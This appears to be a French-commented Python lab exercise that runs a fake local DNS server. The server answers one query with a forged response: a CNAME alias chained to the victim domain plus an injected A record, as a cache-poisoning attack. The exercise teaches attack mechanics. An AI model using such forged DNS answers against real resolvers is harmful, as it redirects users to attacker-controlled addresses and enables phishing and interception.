#!/usr/bin/env python3

import socket

# Des fonctions utilitaires pour encoder les paquets DNS.
# Vous pouvez y jetter un oeil si vous voulez mais ce n'est pas le plus important.
from dns_utils import *

# DNS utilise UDP en temps normal
sok = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Notre faux DNS est joignable localement sur le port 25566
sok.bind(("127.0.0.1", 25566))

# Attendre l'arrivée d'un paquet (requete) DNS
request, client = sok.recvfrom(512)
print("Traitement de la requete pour", client)

# Le nom de domaine utilisé comme alias pour s'affranchir des problèmes de cache
# TODO
alias_name = encode_name(b"existepas.nomde.domaine")
# Le véritable nom de domaine visé par l'attaque
spoofed_name = encode_name(b"nomde.domaine")
# L'adresse IP injectée dans le nom de domaine victime (spoofed_name)
injected_address = bytes((111, 111, 111, 111))

# Pour la simplicité, on ne tient compte que de l'identifiant de la requete qui est nécéssaire pour la réponse
identifier = request[:2]

# On fabrique la réponse en utilisant le même identifiant
response: bytes = identifier
# Puis on met les entêtes classiques
response += encode_header(response=True, opcode=0, authoritative=False, truncated=False, rec_d=True, rec_a=True, rcode=0, questions=1, answers=2, authorities=0, additional=0)
# On remet la question (ici elle est assumée être la même)
response += encode_question_entry(encoded_name=alias_name, type=TYPE_A, clazz=CLASS_IN)
# La réponse pour le nom de domaine demandé qui est un alias pour le nom victime
response += encode_response_entry(encoded_name=alias_name, type=TYPE_CNAME, clazz=CLASS_IN, ttl=3600, rdata=spoofed_name)
# La 2e réponse pour le nom de domaine victime, avec notre adresse IP injectée
response += encode_response_entry(encoded_name=spoofed_name, type=TYPE_A, clazz=CLASS_IN, ttl=3600, rdata=injected_address)

# Envoyer la réponse au client
sok.sendto(response, client)
